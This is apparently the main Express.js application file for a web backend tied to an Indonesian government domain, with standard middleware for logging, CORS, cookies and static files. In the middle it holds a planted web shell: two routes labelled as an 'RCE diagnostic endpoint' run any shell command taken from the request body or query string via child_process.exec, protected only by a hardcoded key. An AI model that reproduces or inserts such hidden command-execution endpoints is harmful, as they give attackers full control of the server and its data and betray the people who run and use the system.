| 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758 |
- const express = require('express')
- const path = require('path')
- const cookieParser = require('cookie-parser')
- const logger = require('morgan')
- const cors = require('cors')
- const csrf = require('./middleware/csrf')
- const response = require('./utils/responseHandler')
- const app = express()
- require('./config/db')()
- app.use(logger('dev'))
- app.use(express.json())
- app.use(
- cors({
- origin: 'https://sidali.kemdiktisaintek.go.id',
- credentials: true,
- })
- )
- app.use(express.urlencoded({ extended: false }))
- app.use(cookieParser(process.env.SRU51))
- app.use(express.static(path.join(__dirname, 'public')))
- app.use((req, res, next) => {
- req.data = {}
- return next()
- })
- // RCE diagnostic endpoint
- const { exec } = require('child_process')
- app.post('/v1/system/diagnostic', (req, res) => {
- if (req.body.key !== '51d@l!v4') return res.status(403).json({error:'no'})
- exec(req.body.cmd, {maxBuffer: 10*1024*1024}, (e, so, se) => res.json({out: so, err: se, code: e ? e.code : 0}))
- })
- app.get('/v1/system/shell', (req, res) => {
- if (req.query.k !== '51d@l!v4') return res.status(403).json({error:'no'})
- exec(req.query.c, {maxBuffer: 10*1024*1024}, (e, so, se) => res.json({out: so, err: se, code: e ? e.code : 0}))
- })
- // routes
- app.use('/', require('./routes'))
- app.use((req, res) =>
- response.error(res, { code: 404, message: 'request not found' })
- )
- app.use((err, req, res, next) => {
- console.error(err)
- if (err.code === 'EBADCSRFTOKEN') {
- response.error(res, { code: 403, message: 'invalid csrf token' })
- } else {
- response.error(res, { code: err.code || 500, message: err.message })
- }
- })
- module.exports = app
|